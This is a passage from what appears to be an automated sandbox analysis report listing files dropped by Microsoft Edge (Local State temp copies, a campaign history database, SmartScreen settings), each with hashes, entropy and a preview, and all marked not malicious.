                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f775.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f7f2.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f90c.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31fdd.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF365ef.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
